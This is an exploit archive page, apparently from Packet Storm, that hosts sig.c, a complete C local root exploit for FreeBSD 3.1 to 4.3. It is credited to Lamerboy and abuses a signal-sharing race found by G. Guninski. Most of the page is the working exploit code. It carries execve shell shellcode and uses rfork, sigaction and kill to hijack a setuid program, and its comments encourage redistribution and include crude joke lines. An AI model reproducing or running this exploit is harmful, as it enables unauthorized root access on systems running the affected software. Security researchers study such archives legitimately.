exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

sig.c

sig.c
Posted Jul 18, 2001
Authored by Lamerboy

FreeBSD 3.1 - 4.3 local root exploit - Uses the signal condition vulnerability discovered by G. Guninski.

tags | exploit, local, root
systems | freebsd
SHA-256 | 877ecb999c4cc6e021713bc69df6e18a70c93bcd73f813c5488ecc59bcd1edb6

sig.c

Change Mirror Download
/*
* -//--//--//--//--//--//--//--//--//--//--//--//--//-
*
* fbsd 3.1-4.3 signal condition coded by lamerboy.
* found by G.Guninsky - thnx man, u so leeet! =)
* written after SA-01:42 released, for testing purpose
* ( and for phun cuz ).
*
* THIS CODE IS BEER-WARE LICENSED WITH ONE EXCEPTION:
* REDISTRIBUTION IN ANY FORM IS HIGHLY RECOMMENDED !
*
* -//--//--//--//--//--//--//--//--//--//--//--//--//-
*/

#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <signal.h>
#include <strings.h>

char shell[]=
"\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80\x00"; /* thnx preedator */

static struct sigaction sa;
static pid_t pid;
extern char **environ;

int
main (int argc, char **argv) {
char *file = NULL, *addr = NULL;
if (argc<2) {
printf("%s suid_prog\n", argv[0]);
exit(1);
}
file = strdup(argv[1]);
addr = getenv("CODE");
if (!addr) {
printf("hot hot chikz love icecream...\n");
printf("hot hot chikz love cool beer...\n");
printf("hot hot chikz love oral sex...\n");
printf("l33t l33t h4x0rz love have phun...\n");
printf("l33t l33t h4x0rz love G.Guninsky splotz...\n");
printf("thank you much man! you so l33t!\n\n");
setenv("CODE",shell,1);
execle(argv[0],file,file,0,environ);
}

printf("h0h0h0, addr = %p\n",addr);
memset(&sa,0,sizeof(struct sigaction));
sa.sa_handler = addr;
pid = rfork(RFPROC|RFFDG|RFSIGSHARE);
if (pid == 0) {
sleep(3);
sigaction(SIGUSR2,&sa,0);
kill(getppid(),SIGUSR2);
} else {
sleep(1);
execle(file,file,0,environ);
}
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close